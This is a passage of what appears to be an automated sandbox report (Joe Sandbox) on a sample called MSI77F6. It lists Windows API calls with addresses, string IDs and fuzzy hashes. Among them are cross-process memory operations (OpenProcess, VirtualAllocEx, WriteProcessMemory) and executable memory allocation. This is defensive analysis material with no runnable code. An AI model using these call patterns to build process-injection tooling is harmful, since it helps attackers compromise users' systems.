                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0080DC40,?,0000000F,0000000C,00000016,0080DC40,?), ref: 007B507B
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                          • Part of subcall function 0077B8A7: _memmove.LIBCMT ref: 0077B8FB
                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 007B50FB
                                        Similarity
                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                        • String ID: REMOVE$THIS
                                        • API String ID: 2528338962-776492005
                                        APIs
                                          • Part of subcall function 007B4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007AC9FE,?,?,00000034,00000800,?,00000034), ref: 007B4D6B
                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007ACFC9
                                          • Part of subcall function 007B4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007ACA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 007B4D36
                                          • Part of subcall function 007B4C65: GetWindowThreadProcessId.USER32(?,?), ref: 007B4C90
                                          • Part of subcall function 007B4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007AC9C2,00000034,?,?,00001004,00000000,00000000), ref: 007B4CA0
                                          • Part of subcall function 007B4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007AC9C2,00000034,?,?,00001004,00000000,00000000), ref: 007B4CB6
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007AD036
                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007AD083
                                        Similarity
                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                        • String ID: @
                                        • API String ID: 4150878124-2766056989
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0080DBF0,00000000,?,?,?,?), ref: 007DA4E6
                                        • GetWindowLongW.USER32 ref: 007DA503
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007DA513
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        APIs
                                        • _memset.LIBCMT ref: 007C57E7
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 007C581D
                                        Similarity
                                        • API ID: CrackInternet_memset
                                        • String ID: ?K|$|
                                        • API String ID: 1413715105-1559644915
                                        • Opcode ID: db7252f631e12a1c235a2d585ebbc2a54deb77b54e6e34e4a4f2dc4d48f48bc3
                                        • Instruction ID: c814580e437c512c34c9dd4a05c714f7a9f05873db12f9dd15a057006612fd6c
                                        • Opcode Fuzzy Hash: db7252f631e12a1c235a2d585ebbc2a54deb77b54e6e34e4a4f2dc4d48f48bc3
                                        • Instruction Fuzzy Hash: 4A313D71800119EBCF11AFA1DC59EEE7FB9FF18350F108019F815A6161DB396956DB60
                                        APIs
                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007DA74F
                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007DA75D
                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007DA764
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyWindow
                                        • String ID: msctls_updown32
                                        • API String ID: 4014797782-2298589950
                                        • Opcode ID: 8e0c25c129eeabcb7bbd9c79dcecf254185dd09133d38c85494447bee6438542
                                        • Instruction ID: cc6846ed3523b374debcff387f79156653c955881862270c8f2b9619d5e8ef17
                                        • Opcode Fuzzy Hash: 8e0c25c129eeabcb7bbd9c79dcecf254185dd09133d38c85494447bee6438542
                                        • Instruction Fuzzy Hash: E6216DB5600205BFDB10EF64DCC5EA737BDFB497A4B04045AFA019B351C674EC11CA61
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007D983D
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007D984D
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007D9872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: 65aa25261e94c7fb9afba4f40ace44424708a20e170758c9e441f172b562de54
                                        • Instruction ID: 71250de0d7ded667a5cce83b284f58d4c1211607bdb00ee880520251b7467d97
                                        • Opcode Fuzzy Hash: 65aa25261e94c7fb9afba4f40ace44424708a20e170758c9e441f172b562de54
                                        • Instruction Fuzzy Hash: E621D731610118BFDF118F54CC85FBB3BBAEF89B64F018125FA049B290C6799C51D7A0
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007DA27B
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007DA290
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007DA29D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: e3d990c088414500fd147626be1ec6562f8ee7d944154f84da51640c77840a57
                                        • Instruction ID: 0a2cc51c4c36f48c0df90998049ecba9f06991836ca7098a5f3ce975ee9aae9a
                                        • Opcode Fuzzy Hash: e3d990c088414500fd147626be1ec6562f8ee7d944154f84da51640c77840a57
                                        • Instruction Fuzzy Hash: 37112371240308BAEF215F61CC46FAB3BB8FFC8B54F014529FA51A6190D27AA851CB20
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00792F79
                                        • GetProcAddress.KERNEL32(00000000), ref: 00792F80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RoInitialize$combase.dll
                                        • API String ID: 2574300362-340411864
                                        • Opcode ID: 1f7780d7228dc7c8bf61b901a90c1e750b16d659324e7933ebbd01ae4cb4e4f8
                                        • Instruction ID: 8a1505074b03d1db04e9dabd4341b86253667a0927c845bbc38048b2973b9dd6
                                        • Opcode Fuzzy Hash: 1f7780d7228dc7c8bf61b901a90c1e750b16d659324e7933ebbd01ae4cb4e4f8
                                        • Instruction Fuzzy Hash: 72E09A70694305ABDF706F71EC99B6936A6BB44706F108464B202D51A0DBB98855EF09
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00792F4E), ref: 0079304E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00793055
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RoUninitialize$combase.dll
                                        • API String ID: 2574300362-2819208100
                                        • Opcode ID: 4d37d24a27a6c6d5b6457c0ce0f01503c17db357961a8dc98396619ab37ef155
                                        • Instruction ID: 020b4f800a8e81dabbf69e0c512bf6ef82fefd8e5e7d36815cfab1a531cc3de3
                                        • Opcode Fuzzy Hash: 4d37d24a27a6c6d5b6457c0ce0f01503c17db357961a8dc98396619ab37ef155
                                        • Instruction Fuzzy Hash: A0E0B6B0644304EBDB305F61ED1DB293AB6BB44702F108854F20AD61B0CBB94910EF19
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LocalTime__swprintf
                                        • String ID: %.3d$WIN_XPe
                                        • API String ID: 2070861257-2409531811
                                        • Opcode ID: bf0c15682d0184c9c07564e087b66f0443584c7891ca2e2525a0eadf35e2d6aa
                                        • Instruction ID: 0c3a23c80c0ee5db89098ecb59b14f42750418687d52fdf993824e90c4474691
                                        • Opcode Fuzzy Hash: bf0c15682d0184c9c07564e087b66f0443584c7891ca2e2525a0eadf35e2d6aa
                                        • Instruction Fuzzy Hash: D9E01271C0A05CFACF14D6929D4A9BB777CBB0C300F10C4A2B916D1000D33D9B54AB21
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007D20EC,?,007D22E0), ref: 007D2104
                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 007D2116
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetProcessId$kernel32.dll
                                        • API String ID: 2574300362-399901964
                                        • Opcode ID: 836b6f26ad3c5f0adc3490abd17d33e10338385ececd558bb301ee134c78ef53
                                        • Instruction ID: 5d72ef149ba7105d7f83ee9a69a6c34b39ce9f2ced01bfb94941d539b2020ed6
                                        • Opcode Fuzzy Hash: 836b6f26ad3c5f0adc3490abd17d33e10338385ececd558bb301ee134c78ef53
                                        • Instruction Fuzzy Hash: 82D0A7345003269FD7315F60F80D61237E6FB14300B01C41AE699D1356D77CC8C1CA20
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0078E6D9,?,0078E55B,0080DC28,?,?), ref: 0078E6F1
                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0078E703
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: IsWow64Process$kernel32.dll
                                        • API String ID: 2574300362-3024904723
                                        • Opcode ID: 324679abd39d8563b8d614094329029a6663f1db294cddb51ab8014ecccf456e
                                        • Instruction ID: d9600690d23b76bb9e282f1756b4f31c02f9c03070e37f5c239f19066536267a
                                        • Opcode Fuzzy Hash: 324679abd39d8563b8d614094329029a6663f1db294cddb51ab8014ecccf456e
                                        • Instruction Fuzzy Hash: DBD05238440322AAD7303B60AC486133BEABB04300B02842AE4A5D2262DBB8C880CB11
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0078E69C,76230AE0,0078E5AC,0080DC28,?,?), ref: 0078E6B4
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0078E6C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                        • API String ID: 2574300362-192647395
                                        • Opcode ID: 07dedbbe12310ed5ead9d9ff8053a328b9ec53cee6f0689693ca1710db513b06
                                        • Instruction ID: 749fe1ae03ed2f24c822919fd7c49a6b6cb568a74dc727459e65a1031d394ee9
                                        • Opcode Fuzzy Hash: 07dedbbe12310ed5ead9d9ff8053a328b9ec53cee6f0689693ca1710db513b06
                                        • Instruction Fuzzy Hash: E5D0A738544322AFD7306F70F80862237D6FB24311B029419E465D1260E77CC8C0D714
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007CEBAF,?,007CEAAC), ref: 007CEBC7
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007CEBD9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                        • API String ID: 2574300362-1816364905
                                        • Opcode ID: 110c1d8818766f34c05c6e91ab495b60dbb31e5bd8c91193dfbcf31755649955
                                        • Instruction ID: 650ab4038455cbb136e5b51b0e85f1bc23da50287e35c4e0e42e597d99bd8356
                                        • Opcode Fuzzy Hash: 110c1d8818766f34c05c6e91ab495b60dbb31e5bd8c91193dfbcf31755649955
                                        • Instruction Fuzzy Hash: 05D05E744047229BD7301F70A848F2137D6FB04304B12C41DE466D2250DA78DC80C614
                                        APIs
                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,007B135F,?,007B1440), ref: 007B1389
                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 007B139B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                        • API String ID: 2574300362-1071820185
                                        • Opcode ID: 94374e7790b1926c77fb6d970738711ca1b171d9664c510dcfd157c6426bf022
                                        • Instruction ID: 3df6e61ca42c4f9c4d75b87032c2ee4239cb58fda0b57eef5447409b6888ffa8
                                        • Opcode Fuzzy Hash: 94374e7790b1926c77fb6d970738711ca1b171d9664c510dcfd157c6426bf022
                                        • Instruction Fuzzy Hash: BED0A7308107229FD7300F24F81879537D6FF04304F458419E495E2650E67CC8C0D724
                                        APIs
                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,007B1371,?,007B1519), ref: 007B13B4
                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 007B13C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                        • API String ID: 2574300362-1587604923
                                        • Opcode ID: bf1d82e2d98dbe9be8c60b01d325c8e22ce753bde274d5c7c2f37128b2f319e4
                                        • Instruction ID: 9fb54c5543476e19813a1bde9bf4cede53a9079d4a592dec52bc33ea23ce82d9
                                        • Opcode Fuzzy Hash: bf1d82e2d98dbe9be8c60b01d325c8e22ce753bde274d5c7c2f37128b2f319e4
                                        • Instruction Fuzzy Hash: E5D0A930800722AFD7300F24F81879237EBFB40304F41842AE4A5E26A0EABCC8C0CB24
                                        APIs
                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,007D3AC2,?,007D3CF7), ref: 007D3ADA
                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007D3AEC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                        • API String ID: 2574300362-4033151799
                                        • Opcode ID: 19201806ec73895acb51574eab47f43814360bb9edbf231b6fe8caeffaf89e1c
                                        • Instruction ID: dda061e14440a36f415b2bf9cae74d4058e0f1d4239ba12b1bdd2c029227e5ad
                                        • Opcode Fuzzy Hash: 19201806ec73895acb51574eab47f43814360bb9edbf231b6fe8caeffaf89e1c
                                        • Instruction Fuzzy Hash: 46D05E305043278ED7204B20A80965137E6FB11304B01942AF4A5D1750EAB8C880C625
                                        APIs
                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,007C6AA6), ref: 0077AB2D
                                        • _wcscmp.LIBCMT ref: 0077AB49
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper_wcscmp
                                        • String ID:
                                        • API String ID: 820872866-0
                                        • Opcode ID: 67903725d85d5787d4d05a1111f424400b4dafcfdcc0729c884599a9e408d031
                                        • Instruction ID: 3b6c9472d304b69fc212f1d1956219db35ef0fbda765a6ae847b0cd0b7ee4c3f
                                        • Opcode Fuzzy Hash: 67903725d85d5787d4d05a1111f424400b4dafcfdcc0729c884599a9e408d031
                                        • Instruction Fuzzy Hash: 23A1F47070010AEBEF15DF65E94567DB7B1FF88380F64C169E80A832A0E7389871C782
                                        APIs
                                        • CharLowerBuffW.USER32(?,?), ref: 007D0D85
                                        • CharLowerBuffW.USER32(?,?), ref: 007D0DC8
                                          • Part of subcall function 007D0458: CharLowerBuffW.USER32(?,?,?,?), ref: 007D0478
                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007D0FB2
                                        • _memmove.LIBCMT ref: 007D0FC2
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                        • String ID:
                                        • API String ID: 3659485706-0
                                        • Opcode ID: df2897d1925454d360292b317a5170108585e7ce740e8d9c24f82b34f4a68e22
